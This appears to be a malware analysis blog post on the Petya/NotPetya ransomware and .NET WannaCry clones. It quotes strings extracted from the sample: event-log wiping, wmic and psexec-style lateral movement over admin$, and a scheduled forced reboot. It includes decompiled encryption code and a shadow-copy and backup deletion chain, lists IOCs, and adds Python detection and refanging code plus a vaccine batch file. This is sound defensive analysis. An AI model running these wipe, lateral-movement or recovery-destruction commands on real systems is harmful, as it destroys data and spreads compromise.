  • 00000001339C   00001001419C      0   \cmd.exe
  • 0000000133B0   0000100141B0      0   wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
  • 0000000134A8   0000100142A8      0   schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02d
  • 000000013520   000010014320      0   at %02d:%02d %ws
  • 000000013544   000010014344      0   shutdown.exe /r /f
  • 00000001356C   00001001436C      0   /RU "SYSTEM"
  • 00000001358C   00001001438C      0   dllhost.dat
  • 0000000135FB   0000100143FB      0   u%s \\%s -accepteula -s
  • 000000013630   000010014430      0   -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1
  • 0000000136A0   0000100144A0      0   wbem\wmic.exe
  • 0000000136C0   0000100144C0      0   %s /node:"%ws" /user:"%ws" /password:"%ws"
  • 000000013718   000010014518      0   process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1
  • 0000000137B4   0000100145B4      0   \\%s\admin$
  • 0000000137CC   0000100145CC      0   \\%ws\admin$\%ws
  • 000000015468   000010016C68      0   c:\Windows\
  • 000000015480   000010016C80      0   rundll32.exe
  • 000000016CD0   0000100184D0      0   rundll32.exe
  • 000000016CF0   0000100184F0      0   c:\Windows\
In the above strings we clearly see "process call create", which goes to rundll32.exe (physical location), and it again points to a file in the Windows folder. But this did not confirm whether this sample or some other file is the one executed, so I copied the DLL file to the Windows folder and executed the following command:
rundll32.exe <sample name.dll> #1
After that step I referred to the code of the DLL and found the following:

So there is a connection between the file execution, schtasks and shutdown.exe. After executing the DLL, we saw that a scheduled task was added.

It created At1, scheduled for exactly one hour after the creation of the task. Our guess or instinct says it is for the shutdown call we saw in the previous screenshot.

Our analysis is correct: the scheduled task is actually for shutting down the system. After the restart it brings up the ransom note page:

So we cannot access our files; they are encrypted. Payment instructions, bitcoin wallet details and a blinking prompt to enter the purchased key are shown. We randomly typed some text and it throws an incorrect key error.
Email address associated with this ransomware:
Current status of this email address:
Posteo is an email service provider offering paid email accounts. In this Petya case, the attackers used a Posteo address as the contact option. Their abuse team checked this and blocked that contact address.
Hence, paying the ransom cannot guarantee that the victim will receive the decryption key from the attackers, since the attackers can no longer be contacted through that email address.
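The format strings listed above (rundll32 with ordinal #1 from the Windows folder, the wevtutil/fsutil log wipe, the schtasks/at reboot, wmic remote process creation and the admin$ share) translate directly into process-creation detections. As an added example (not from the original post), a Python rule set over constructed command-line events in that shape; SAMPLE.dll, 10.0.0.7 and the account name are placeholders, and the rule names are this example's own.

```python
import re
from typing import Dict, List, Set

# Detection patterns derived from the format strings listed above: each rule is
# (name, regex over the process command line).
RULES = [
    ("rundll32_ordinal_from_windows_dir",
     re.compile(r'rundll32(?:\.exe)?\s+[\\"]*C:\\Windows\\[^\\"\s]+[\\"]*\s*,?\s*#1', re.I)),
    ("event_log_wipe",
     re.compile(r"wevtutil\s+cl\s+\w+.*fsutil\s+usn\s+deletejournal", re.I)),
    ("scheduled_forced_reboot",
     re.compile(r"schtasks.*?/Create.*?shutdown(?:\.exe)?\s+/r\s+/f|\bat\s+\d{2}:\d{2}\s+.*shutdown", re.I)),
    ("wmic_remote_process_create",
     re.compile(r"wmic(?:\.exe)?\s+/node:.*?/user:.*?/password:.*?process\s+call\s+create", re.I)),
    ("psexec_style_admin_share",
     re.compile(r"\\\\[^\\\s]+\\admin\$|\\\\[^\\\s]+\s+-accepteula\s+-s\b", re.I)),
]

# Constructed process-creation events (image + command line), shaped after the
# strings above. SAMPLE.dll, 10.0.0.7 and CORP\svc are placeholders, not real indicators.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'C:\Windows\System32\rundll32.exe "C:\Windows\SAMPLE.dll",#1'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security "
                r"& wevtutil cl Application & fsutil usn deletejournal /D C:"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 14:35'},
    {"image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": r'wmic.exe /node:"10.0.0.7" /user:"CORP\svc" /password:"<redacted>" '
                r'process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\SAMPLE.dll\" #1"'},
    {"image": r"C:\Windows\dllhost.dat",
     "cmdline": r'dllhost.dat \\10.0.0.7 -accepteula -s -d C:\Windows\System32\rundll32.exe "C:\Windows\SAMPLE.dll",#1'},
    {"image": r"C:\Windows\System32\rundll32.exe",      # benign control line
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

def match_event(cmdline: str) -> List[str]:
    """Names of every rule whose pattern occurs in one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run all rules over the events and keep only those that fired something."""
    hits: List[Dict[str, object]] = []
    for ev in events:
        names = match_event(ev["cmdline"])
        if names:
            hits.append({"image": ev["image"], "cmdline": ev["cmdline"], "rules": names})
    return hits

def distinct_rules(hits: List[Dict[str, object]]) -> Set[str]:
    """Distinct rule names across all hits; several together point to this campaign."""
    names: Set[str] = set()
    for h in hits:
        names.update(h["rules"])  # type: ignore[arg-type]
    return names

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for h in hits:
        print(h["rules"], "<-", h["cmdline"])
    print("distinct behaviours:", len(distinct_rules(hits)))
```

Any one rule fires on legitimate administration now and then; the log wipe and the scheduled forced reboot appearing on the same host within minutes is what makes the combination worth paging on.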
We collected the associated domains and IPs for detection purposes with this post.
Bitcoin address: 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
C&C / payment servers (Tor hidden services):
·         mischapuk6hyrn72(.)onion/
·         petya3jxfp2f7g3i(.)onion/
·         petya3sen7dyko2n(.)onion/
·         mischa5xyix2mrhd(.)onion/MZ2MMJ
·         mischapuk6hyrn72(.)onion/MZ2MMJ
·         petya3jxfp2f7g3i(.)onion/MZ2MMJ
·         petya3sen7dyko2n(.)onion/MZ2MMJ
Possible IP addresses:
·         185.165(.)29(.)78
·         84.200(.)16(.)242
·         111.90(.)139(.)247
·         95.141(.)115(.)108
·         89.146(.)220(.)134
Action steps:
Snort and YARA detection rules for this Petya variant are available from independent sources on the net; apply the Snort rules to detect the attack on the network. Blocking the spreading domains and IPs at the firewall and proxy will help prevent the attack. We recommend blocking SMB (TCP ports 445 and 139) and RDP (TCP port 3389) to all computers from the internet, and ensuring that every Windows host has the latest security updates installed, especially MS17-010.
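To make the defanged lists above usable in a proxy or firewall blocklist and in log searches, the indicators first have to be refanged and then matched correctly: subdomains of a listed domain should hit, look-alike names should not. The following is an added example written for this page, not code from the original post or from any vendor tool. The indicator values are copied from the lists above; the proxy log format (destination URL in the third column, destination IP in the fourth) is an assumption and the log lines are constructed.

```python
"""Refang the indicators listed in this post and scan log lines for hits."""
import ipaddress
import re
from urllib.parse import urlsplit

# Indicators exactly as listed above (defanged with "(.)").
DEFANGED_DOMAINS = [
    "benkow(.)cc", "Coffeinoffice(.)xyz", "french-cooking(.)com",
    "sundanders(.)online", "casconut(.)xyz", "blumbeerg(.)xyz",
    "insurepol(.)in", "whitefoam(.)org(.)uk", "xfusion(.)co(.)uk",
    "affliates(.)in", "hyporus(.)in", "dantan(.)club",
    "kababmachatu(.)xyz", "damodot(.)xyz", "ballotvize(.)xyz",
]
DEFANGED_IPS = [
    "185.165(.)29(.)78", "84.200(.)16(.)242", "111.90(.)139(.)247",
    "95.141(.)115(.)108", "89.146(.)220(.)134",
]


def refang(indicator: str) -> str:
    """Undo the usual defanging conventions: (.) [.] {.} and hxxp."""
    s = indicator.strip().lower()
    for defanged in ("(.)", "[.]", "{.}", " dot "):
        s = s.replace(defanged, ".")
    s = re.sub(r"^hxxp", "http", s)
    return s.rstrip("/")


def build_blocklist(domains, ips):
    """Return (set of domains, set of IPs); IPs are validated while refanging."""
    refanged_ips = {str(ipaddress.ip_address(refang(ip))) for ip in ips}
    return {refang(d) for d in domains}, refanged_ips


def host_matches(host: str, domains: set) -> bool:
    """Exact match or any subdomain of a listed domain; 'notfrench-cooking.com' must not hit."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def extract_host(field: str) -> str:
    """Pull the host out of a URL or a bare host[:port] field."""
    if "://" in field:
        return urlsplit(field).hostname or ""
    return field.split(":")[0]


def scan_log(lines, domains, ips):
    """Return (line_no, indicator, reason) for every line touching an indicator.

    Assumed (constructed) log shape: whitespace-separated fields, destination
    URL or host in column 3, destination IP in column 4.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) < 4:
            continue
        host = extract_host(parts[2])
        dst_ip = parts[3]
        if host_matches(host, domains):
            hits.append((n, host, "domain"))
        elif host in ips or dst_ip in ips:
            hits.append((n, host if host in ips else dst_ip, "ip"))
    return hits


# Constructed sample proxy log (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 GET http://www.french-cooking.com/update.php 203.0.113.9 200
10.0.0.7 GET http://www.example.com/ 198.51.100.4 200
10.0.0.9 CONNECT unknown.host:443 84.200.16.242 200
10.0.0.9 GET http://coffeinoffice.xyz/ 203.0.113.10 404
10.0.0.11 GET http://notfrench-cooking.com/ 198.51.100.5 200
""".splitlines()

DOMAINS, IPS = build_blocklist(DEFANGED_DOMAINS, DEFANGED_IPS)

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG, DOMAINS, IPS):
        print(hit)
```

The refanged sets can be exported straight into a proxy category or firewall object group; the subdomain rule is what makes the domain list useful, since the spreading hosts are unlikely to be contacted by their bare apex name.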
A Petya vaccine is available as a batch file from BleepingComputer. It works because this variant checks for a file named perfc in C:\Windows before running and exits if one already exists (the batch file also creates perfc.dll and perfc.dat as a precaution):

Or copy the following batch file and save it as .bat:
@echo off
REM Administrative check from here:
REM Vaccination discovered by
REM Batch file created by Lawrence Abrams of @bleepincomputer @lawrenceabrams

echo Administrative permissions required. Detecting permissions...
net session >nul 2>&1

if %errorLevel% == 0 (
    if exist C:\Windows\perfc (
        echo Computer already vaccinated for NotPetya/Petya/Petna/SortaPetya.
    ) else (
        echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc
        echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dll
        echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dat

        REM Read-only so the files are not casually deleted or overwritten.
        attrib +R C:\Windows\perfc
        attrib +R C:\Windows\perfc.dll
        attrib +R C:\Windows\perfc.dat

        echo Computer vaccinated for current version of NotPetya/Petya/Petna/SortaPetya.
    )
) else (
    echo Failure: You must run this batch file as Administrator.
)

Further attack wave in Ukraine:
While writing this analysis report we learned of WannaCry clone attacks happening in Ukraine. We obtained three samples for analysis:
Sample1: MD5: 0BDE638B274C7F9C6C356D3987ED1A2D
Sample2: MD5: 87BE992695B752D86AEAB1116EB5393F
Sample3: MD5: 5C7C894A1CCFD8C8E0F174B0149A6601

All three samples are .NET compiled files:

Reversing the samples for analysis:
The samples show a compile timestamp of 1 January 2016, but when we searched the hashes on VirusTotal they had only been uploaded a couple of days earlier. So they are actually new samples, and the compile date was customised or modified by the malware author (the PE header timestamp is a trivially editable field).

Sample 1 contains WannaCry strings inside the code. We manually checked the other two samples and they carry the same strings. We successfully recovered the code of these samples; the program is shown below:
    // Decompiled excerpt (sample 1); only these members are reproduced here.
    internal class Program
    {
        // Private key value not reproduced on this page.
        public static string DEMO_KEY_PRIVATE = "...";
        // Base64-encoded CryptoAPI PUBLICKEYBLOB (RSA1 magic, 2048-bit modulus).
        public static string DEMO_KEY_PUBLIC = "BgIAAACkAABSU0ExAAgAAAEAAQAdbwYdlbhbpDhA8l/d4oYSxIfiYq2AZkp2tj+07AOFQMP1u7MEIrEyoYDfCnaAgfOhuzRNy3m5Dq3ESl5zsmpa6mxR7jyg1c/lcgYQELYnJhpCZtRDWXiAJlOTzHehLquYg5jRXmtS7fKqAnU4l1xRqx1MSLk0M/U+c/v21OWZOPPWj399OmladHnO518JpyI3cm62wtr2JI7df5RGJFp+5EiHglHd0tcFatm0KgPCpf+VNQhIz4sA+wrO/m1Nbp8VVBc5xmk7oDmic3gxkkqD3eBNkDse+OMgpZJhvQ1bFOr2/UBxUiqVf+K01KN/Y7/f6cebWf43nx0q4FinyPu3";
        public static string DEMO_EXTENSIONS = "jpg,jpeg,png,tif,gif,bmp";
        public static string ENCRYPTION_TOOL_FNAME = "ed.exe";
        public static string ENCRYPTED_PRIVATE_KEY_FNAME = "key.encrypted";
        public static string[] ALL_EXTENSIONS = new string[] { /* list cut off in the decompiled output */ };

        // Enumerates fixed, removable and network drives: the targets for encryption.
        public static List<string> ListDrives()
        {
            DriveInfo[] arg_0B_0 = DriveInfo.GetDrives();
            List<string> list = new List<string>();
            DriveInfo[] array = arg_0B_0;
            for (int i = 0; i < array.Length; i++)
            {
                DriveInfo driveInfo = array[i];
                if (driveInfo.DriveType == DriveType.Fixed || driveInfo.DriveType == DriveType.Removable || driveInfo.DriveType == DriveType.Network)
                {
                    list.Add(driveInfo.Name); // remainder of the loop body not shown in the post; presumed
                }
            }
            return list;
        }
    }
The snippet above holds the key material (the public key is a Base64-encoded CryptoAPI PUBLICKEYBLOB, both keys carry a DEMO_ prefix), the targeted file extensions, the name of the encryption tool (ed.exe) and the name of the file that stores the encrypted private key. We moved on to the second sample, which contains resources in the form of images holding the Bitcoin details and the ransom note:
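DEMO_KEY_PUBLIC above begins with BgIAAACkAABSU0Ex, which Base64-decodes to a CryptoAPI PUBLICKEYBLOB (bType 0x06, CALG_RSA_KEYX, "RSA1" magic): the format .NET's RSACryptoServiceProvider.ExportCspBlob(false) emits. The following added example, not code from the samples or from the original post, parses that blob to recover the modulus and exponent and re-encodes the key as PKCS#1 PEM so it can be examined with openssl rsa -RSAPublicKey_in -in key.pem -text -noout; the function names are mine and the Base64 string is copied from the snippet above.

```python
"""Parse the CryptoAPI PUBLICKEYBLOB embedded in the .NET sample and
re-encode it as a PKCS#1 RSAPublicKey PEM."""
import base64
import struct

# Copied from DEMO_KEY_PUBLIC in the decompiled excerpt above.
DEMO_KEY_PUBLIC = (
    "BgIAAACkAABSU0ExAAgAAAEAAQAdbwYdlbhbpDhA8l/d4oYSxIfiYq2AZkp2tj+07AOFQM"
    "P1u7MEIrEyoYDfCnaAgfOhuzRNy3m5Dq3ESl5zsmpa6mxR7jyg1c/lcgYQELYnJhpCZtRD"
    "WXiAJlOTzHehLquYg5jRXmtS7fKqAnU4l1xRqx1MSLk0M/U+c/v21OWZOPPWj399OmladH"
    "nO518JpyI3cm62wtr2JI7df5RGJFp+5EiHglHd0tcFatm0KgPCpf+VNQhIz4sA+wrO/m1N"
    "bp8VVBc5xmk7oDmic3gxkkqD3eBNkDse+OMgpZJhvQ1bFOr2/UBxUiqVf+K01KN/Y7/f6c"
    "ebWf43nx0q4FinyPu3"
)

PUBLICKEYBLOB = 0x06          # BLOBHEADER.bType
CALG_RSA_KEYX = 0x0000A400    # BLOBHEADER.aiKeyAlg for RSA key exchange


def parse_capi_rsa_public_blob(blob: bytes) -> dict:
    """BLOBHEADER (8 bytes) + RSAPUBKEY (12 bytes) + little-endian modulus."""
    if len(blob) < 20:
        raise ValueError("blob too short for BLOBHEADER + RSAPUBKEY")
    b_type, b_version, _reserved, alg_id = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, pubexp = struct.unpack_from("<4sII", blob, 8)
    if b_type != PUBLICKEYBLOB:
        raise ValueError(f"not a PUBLICKEYBLOB (bType=0x{b_type:02x})")
    if magic != b"RSA1":
        raise ValueError(f"unexpected RSAPUBKEY magic {magic!r}")
    mod_len = bitlen // 8
    if len(blob) != 20 + mod_len:
        raise ValueError(f"expected {20 + mod_len} bytes, got {len(blob)}")
    modulus = int.from_bytes(blob[20:20 + mod_len], "little")  # CAPI stores it little-endian
    return {"version": b_version, "alg_id": alg_id, "bits": bitlen, "e": pubexp, "n": modulus}


def _der_len(n: int) -> bytes:
    """DER length: short form below 0x80, otherwise 0x8N followed by N length bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _der_int(v: int) -> bytes:
    """DER INTEGER; a leading 0x00 keeps values with the top bit set positive."""
    body = v.to_bytes(max(1, (v.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:
        body = b"\x00" + body
    return b"\x02" + _der_len(len(body)) + body


def to_pkcs1_der(n: int, e: int) -> bytes:
    """RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }"""
    seq = _der_int(n) + _der_int(e)
    return b"\x30" + _der_len(len(seq)) + seq


def to_pkcs1_pem(n: int, e: int) -> str:
    b64 = base64.encodebytes(to_pkcs1_der(n, e)).decode("ascii")  # 76-char lines
    return "-----BEGIN RSA PUBLIC KEY-----\n" + b64 + "-----END RSA PUBLIC KEY-----\n"


def decode_demo_key() -> dict:
    return parse_capi_rsa_public_blob(base64.b64decode(DEMO_KEY_PUBLIC))


if __name__ == "__main__":
    key = decode_demo_key()
    print(f"RSA-{key['bits']} e={key['e']} alg=0x{key['alg_id']:08x}")
    print(to_pkcs1_pem(key["n"], key["e"]))
```

The blob decodes to an RSA-2048 key with the usual exponent 65537; the PEM output is what you would feed to openssl or hand to a decryptor project if a private key ever surfaces.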
    // Decompiled excerpt (sample 2): the ransom note image is an embedded resource.
    internal static Bitmap wannacry
    {
        get
        {
            return (Bitmap)Resources.ResourceManager.GetObject("wannacry", Resources.resourceCulture);
        }
    }

Now we move to our final sample. Its code is the most interesting of the three.
    // ed.CryptoFile (decompiled excerpt, sample 3)
    private static string[] _exProcesses = new string[] { /* process names cut off in the decompiled output */ };
This sample checks for the presence of anti-malware products on the system. Further on we see the AES-related code (AES-256 in CBC mode with an explicit key and IV):
    using (AesManaged aesManaged = new AesManaged())
    {
        aesManaged.Mode = CipherMode.CBC;
        aesManaged.KeySize = 256;
        aesManaged.Key = key;
        aesManaged.IV = iv;
        // remainder not shown in the post
    }
A shortened version of the CryptoFile class follows. Encrypt takes the RSA public key blob and Decrypt the private one while the file data itself goes through AES, which points to the usual hybrid scheme of a symmetric file key wrapped with RSA; CRYPT_BYTES (5,242,880 = 5 MiB) suggests that only the first 5 MiB of each file is passed to the cipher, a common speed trade-off:
    public static class CryptoFile
    {
        // 5 MiB; by its name, the number of bytes of each file that are encrypted
        public static long CRYPT_BYTES = 5242880L;
        private static bool KillFileLockProcess(string path) { ... }
        public static bool Encrypt(string path, byte[] publicKeyBlob) { ... }
        public static bool Decrypt(string path, byte[] privateKeyBlob) { ... }
    }
It also contains code to delete volume shadow copies. When run with the -delshadowcopies switch it executes the chain below, which also turns off Windows recovery and boot-failure handling and deletes the backup catalog, so the victim cannot restore locally:
    if (!(text == "-delshadowcopies"))
    {
        goto IL_52B;
    }
    // vssadmin/wmic: remove shadow copies; bcdedit: disable recovery; wbadmin: remove backup catalog
    PS.ExecuteAndForget("cmd.exe", "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog –quiet");
    goto IL_52B;
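The process-creation behaviours seen in this analysis (rundll32 loading the sample by export ordinal #1, the scheduled task that runs shutdown.exe /r, and the -delshadowcopies command chain just above) can be turned into host-side detection logic. The following is an added example written for this page, not code from the original post or from either malware family, and it is a small rule engine over process command lines rather than a Snort or YARA rule. The rule names and the event format are my own; the command lines are constructed to resemble Sysmon event 1 / Security 4688 records, and the schtasks and at forms show what such a task would look like, not strings taken from the samples.

```python
"""Host-side detection for the process behaviours described in this post."""
import re

# Rules that fire on a single command line.
RULES = {
    # rundll32 <dll> #1 / rundll32 <dll>,#1: loading a DLL by export ordinal.
    "rundll32_export_ordinal": re.compile(
        r'rundll32(?:\.exe)?\s+(?:"[^"]+"|\S+?)\s*,?\s*#\d+\b', re.I),
    # A task created with schtasks or at whose action is shutdown /r.
    "scheduled_shutdown": re.compile(
        r"(?:schtasks(?:\.exe)?\s+/create|\bat(?:\.exe)?\s+\d{1,2}:\d{2})"
        r".*shutdown(?:\.exe)?\s+(?:/\w+\s+)*/r\b", re.I),
}

# Pieces of the -delshadowcopies chain. One alone is routine admin work;
# two or more in a single command line is the ransomware pattern.
RECOVERY_KILL = [
    re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I),
    re.compile(r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I),
    re.compile(r"wbadmin(?:\.exe)?\s+delete\s+catalog", re.I),
]
RECOVERY_KILL_THRESHOLD = 2


def classify(cmdline: str) -> list:
    """Return the names of every rule a command line triggers (possibly none)."""
    findings = [name for name, rx in RULES.items() if rx.search(cmdline)]
    kills = sum(1 for rx in RECOVERY_KILL if rx.search(cmdline))
    if kills >= RECOVERY_KILL_THRESHOLD:
        findings.append("recovery_kill_chain")
    return findings


def scan(events):
    """events: iterable of (image, cmdline) pairs, e.g. from Sysmon event 1.

    Returns [(index, findings)] for the events that triggered a rule.
    """
    hits = []
    for i, (_image, cmd) in enumerate(events):
        findings = classify(cmd)
        if findings:
            hits.append((i, findings))
    return hits


# Constructed events: what the behaviours in this post would look like in a
# process-creation log, next to benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Windows\sample.dll #1"),
    (r"C:\Windows\System32\rundll32.exe", r"rundll32.exe shell32.dll,Control_RunDLL"),
    (r"C:\Windows\System32\schtasks.exe",
     r'schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 14:35'),
    (r"C:\Windows\System32\schtasks.exe",
     r'schtasks /Create /SC daily /TN Backup /TR "C:\Tools\backup.exe" /ST 02:00'),
    (r"C:\Windows\System32\at.exe", r"at 14:35 C:\Windows\system32\shutdown.exe /r /f"),
    (r"C:\Windows\System32\cmd.exe",
     "cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete"
     " & bcdedit /set {default} bootstatuspolicy ignoreallfailures"
     " & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet"),
    (r"C:\Windows\System32\vssadmin.exe", "vssadmin delete shadows /for=C: /oldest"),
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS):
        print(idx, findings, SAMPLE_EVENTS[idx][1])
```

The threshold on the recovery chain is the important design choice: a lone vssadmin call from a backup job is noise, whereas vssadmin, wmic, bcdedit and wbadmin chained in one cmd.exe invocation is precisely the string carried by this sample and by many other ransomware families.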

The recent campaign of ransomware attacks gives many indications that it is the work of organised threat actors or a state-sponsored operation; Ukraine has been specifically targeted over the last couple of weeks. Proper countermeasures, periodic patching, timely assessment for host and network compromise, and regular vulnerability assessments can keep an organisation on the safer side.

 Post made by 

